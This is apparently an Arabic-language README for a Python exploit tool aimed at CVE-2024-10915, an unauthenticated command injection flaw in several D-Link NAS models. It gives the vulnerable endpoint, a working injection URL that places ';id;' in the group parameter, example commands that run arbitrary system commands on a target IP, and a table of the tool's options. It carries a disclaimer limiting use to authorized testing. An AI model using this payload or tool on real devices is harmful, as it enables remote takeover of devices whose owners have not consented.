
أداة استغلال بلغة Python لثغرة CVE-2024-10915، وهي ثغرة حقن أوامر في أجهزة D-Link NAS. تنفذ أوامر نظام عشوائية عبر نقطة النهاية /cgi-bin/account_mgr.cgi لاختبار الأمان المصرح به.
يستهدف هذا الاستغلال المكتوب بلغة بايثون ثغرة حقن أوامر في عدة منتجات D-Link NAS عبر نقطة النهاية /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. تسمح الثغرة للمهاجمين غير المصادق عليهم بتنفيذ أوامر نظام عشوائية على الجهاز المتأثر.
تؤثر CVE-2024-10915 على عدة موديلات D-Link NAS. يمكن للمهاجم حقن أوامر من خلال معلمة group في أمر cgi_user_add، مما يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.
D-Link DNS-320
D-Link DNS-320LW
D-Link DNS-325
D-Link DNS-340L
نقطة النهاية المعرضة للخطر: `/cgi-bin/account_mgr.cgi?cmd=cgi_user_add`
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'
Python 3.x
مكتبة requests
تثبيت التبعيات المطلوبة:
pip3 install requests
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt
هذا المشروع مخصص للأغراض التعليمية والاختبارات المصرح بها فقط. لا تستخدم هذه الأداة على شبكات أو أنظمة ليس لديك إذن صريح لاختبارها. المؤلفون لا يتحملون أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج.
| الخيار | الوصف |
|---|
-u / --url | عنوان URL الأساسي للهدف (مثل http://192.168.1.100) |
-c / --command | الأمر المراد تنفيذه على الجهاز (الافتراضي: id) |
-p / --proxy | استخدام وكيل HTTP (مثل http://127.0.0.1:8080) |
-o / --output | حفظ استجابة HTTP في ملف |
-l / --list | عرض منتجات D-Link NAS المتأثرة |